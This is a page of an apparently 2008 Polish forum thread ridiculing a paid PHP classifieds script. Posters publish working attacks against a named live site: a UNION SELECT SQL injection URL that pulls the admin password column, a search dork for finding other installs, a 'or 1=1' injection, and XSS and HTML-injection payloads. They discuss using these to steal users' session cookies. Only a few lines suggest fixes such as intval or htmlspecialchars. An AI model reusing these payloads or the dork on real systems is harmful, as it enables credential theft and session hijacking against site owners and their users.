Strona 1 z 6 123 ... OstatniOstatni
Pokaż wyniki 1 do 10 z 53

Temat: profesjonalny_skrypt_ogloszeniowy

  1. #1
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie profesjonalny_skrypt_ogloszeniowy

    http://allegro.pl/item372595870_prof...sql_dotpa.html

    http://www.serwis.545.pl/show_cat.php
    ?idk=5/**/union/**/select/**/1,haslo/**/from/**/admin/*

    Dork => "show_cat.php?idk="

    Profesjonalny i Znakomity.... zal dupe sciska.

    Kod php:
    if (!is_int($_GET[id])) die(hacking); 
    skomplikowane co nie :P
    Ostatnio edytowane przez gogulas : 06-07-2008 - 18:02
    http://gogulas.yoyo.pl/h.gif

  2. #2
    rip
    rip jest offline Banned
    Zarejestrowany
    May 2008
    Postów
    534

    Domyślnie

    no coz...

    if (!is_int($_GET[id])) die(hacking);
    intval($_GET['id']) i juz.

  3. #3
    Avatar VLN
    VLN
    VLN jest offline Banned
    Zarejestrowany
    Jan 2008
    Postów
    277

    Domyślnie

    Kod php:
    settype($_GET['idk'], "integer"); 
    http://www.serwis.545.pl/podstrona.php?id=19&link="/><script>alert(document.cookie)</script>


    Pozdrawiam VLN.
    Kod php:
    $zmienna $_POST['COS']; 
    Zamiast tego :
    Kod php:
    $zmienna htmlspecialchars($_POST['COS']); 
    I mamy zabezpieczenie przed XSS

  4. #4
    Zarejestrowany
    May 2007
    Skąd
    Kraków
    Postów
    371

    Domyślnie

    no spoko..

    tylo nie robi to nic strasznego ;P

  5. #5
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    rip, tru intval rox :P

    w ogloszeniach tez mozna xssa dac, na dodatek admin musi takie ogloszenie zaakceptowac... wiec podzieli sie sesja :P

    z tego skryptu az bije profesjonalizmem i znakomitoscia ;p
    http://gogulas.yoyo.pl/h.gif

  6. #6
    Avatar VLN
    VLN
    VLN jest offline Banned
    Zarejestrowany
    Jan 2008
    Postów
    277

    Domyślnie

    Wiem .Samo w sobie nic nie robi.Mamy jednak panel logowania (http://www.serwis.545.pl/logowanie.php) i rejestrację . Co oznacza że jest przeznaczone dla innych.
    Tak więc kradzież ciasteczek luserów .


    Pozdrawiam VLN.
    Kod php:
    $zmienna $_POST['COS']; 
    Zamiast tego :
    Kod php:
    $zmienna htmlspecialchars($_POST['COS']); 
    I mamy zabezpieczenie przed XSS

  7. #7
    Zarejestrowany
    May 2007
    Skąd
    Kraków
    Postów
    371

    Domyślnie

    no spoko...

    nawet ja takiej fuszery w życiu nie odwaliłem...

    i za takie cos 55zł?!? fajerow nie brak ;P (ludzie kupuja(!))

  8. #8
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    ponoc co 2 sekundy rodzi sie jeden... ale teraz mysle ze to prawo nieco trzeba zmodyfikowac w erze internetu... co sekunde 2 frajerow
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  9. #9
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    wydlubalem strone autora tego skryptu....
    http://www.zboiska.yoyo.pl/
    profesjonalizm nieomal stracil mnie z fotela.
    gg na tej stronie jest takie samo jak gg na aukcji, uzytkownik nr. 1 w przykladowej stronie z ogloszeniami (EDI/qqqqq) podaje ten adres w polu moja strona www...

    Dla pracowników Allegro:
    Jestem autorem skryptu ogłoszeń. Skrypt napisałem w oparciu o zdobytą wiedzę oraz doświadczenie.
    Ostatnio edytowane przez gogulas : 06-07-2008 - 23:12
    http://gogulas.yoyo.pl/h.gif

  10. #10
    Avatar javaman
    javaman jest offline www.javainside.pl
    Zarejestrowany
    Mar 2008
    Skąd
    no przed monitorem przecież...
    Postów
    474

    Domyślnie

    oł rili - fery kufa pfofesjonafny serfis

    http://www.serwis.545.pl/rej2.php

    http://www.serwis.545.pl/show_cat.ph...20or%201=1%20#

    na poniższym przyjrzyjcie się belce nad niebieskim polem
    http://www.serwis.545.pl/podstrona.p...AVAMAN_RULEZ_:)

    Date Sun, 08 Jun 2008 00:00:10 GMT
    Server Apache Web Serwer
    X-Powered-By PHP/4.4.8
    Expires Thu, 19 Nov 1981 08:52:00 GMT

    a teraz najlepsze

    http://www.serwis.545.pl/podstrona.p....pl/lol.JPG%3E

    i wiecie co... uzylem tutaj tylko prostego html, więc można wykonać też wiele innych rzeczy, java scripty, xss, co sobie życzycie. pozdrawiam frajerów którzy to kupią...

Strona 1 z 6 123 ... OstatniOstatni

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj